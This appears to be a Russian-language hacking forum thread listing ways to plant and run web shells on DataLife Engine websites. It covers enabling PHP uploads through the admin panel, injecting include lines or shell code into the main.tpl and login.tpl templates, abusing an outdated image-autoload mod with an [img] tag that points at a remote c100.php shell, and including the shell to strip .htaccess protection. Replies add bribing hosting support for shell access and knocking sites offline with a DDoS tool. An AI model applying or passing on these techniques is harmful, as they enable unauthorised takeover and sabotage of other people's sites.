Решил отписать статью со всеми мне известными способами заливки и исполнения шеллов в движке DataLife Engine Некоторые способы работают на одном или ином движке, некоторые на всех. Если не получилось так, то пробуйте иначе. Начну я со способов с доступом к админке. Первый способ! Идём в настройки системы - выбираем настройки по загрузке файлов (ищите там где картинки сверху настроек и ниже меню админки) и вписываем в строку разрешенных файлов для загрузки php. Сохраняем. Дальше идём в добавление новости, заливаем шелл. И вставляем в новость слово типа [attachment.....] берём его в теги Нажимаем кнопку "Предварительный просмотр" и видим адресс шелла. Второй способ! Идём в админку - шаблоны - и вставляем в main.tpl к примеру {include "shell"} Идём на сайт и быстро делаем свои дела. Или же если есть доступ в login.tpl Вставляем код шелла прямо в него. Третий способ может использоват и с админкой и с правами журналиста. Сейчас популярен мод автозагрузки картинок на сайт. И на 30% сайтов стоит старая версия мода, в которой нет проверки формата. Т.е. мод работает так: Все файлы/картинки что в тегах и находятся на стороннем домене автоматом идут на сервер. В старой версии, хватает сделать так: и добавить новость. Дальше идём в новость и смотрим адресс шелла. Ну и наверно последний способ, сам по себе не связан с багами . Идёте в whois сервис. Пробиваете dns сервера желаемого сайта. Обычно это ns1.hosting.ru Идём на *hosting.ru и узнаем аську какого нить стороннего саппорта. Стучим ему, даём 10$ и получаем шелл ЗЫ я так нашёл 30 хостингов с таким саппортом. 50% сайтов... Вспомню способы, добавлю тут Кому помогло, не откажусь от «+»! P.S.Модеры , эта тема нужна чтобы в теме с багами dle по 100 раз не спрашивали о заливке шелла!
Если вы хотите убить dle сайт. делаем это с 5 дедов на которых стоит программа sprut ddos большинство хостингов блокируют сайт за нагрузку. а сам дле дает приличный вес.
заливаете шелл, идем на него. видим что открыть шелл нам запрещает добрый htaccess. эту проблемму решаем инклудом. {include file="uploads/images..shell.php"} вставляем эту строку в шаблон через админку. идём в шелл через сайт, удаляем htaccess и потом удаляем инклуд. теперь нам не мешает хтассесс в директории шелла. т.е. мы используем инклуд для импорта шелла в код main чтобы удалить мешающий нам хтассесс
вот посмотри например.. вот адрес шелл: и я добавляю или редакторию новост и зделаю так : [img*]http://ermeninisikim.narod.ru/c100.php[/img*] и потом если посмотрю адрес шелл-а и вию : http://ermeninisikim.narod.ru/c100.php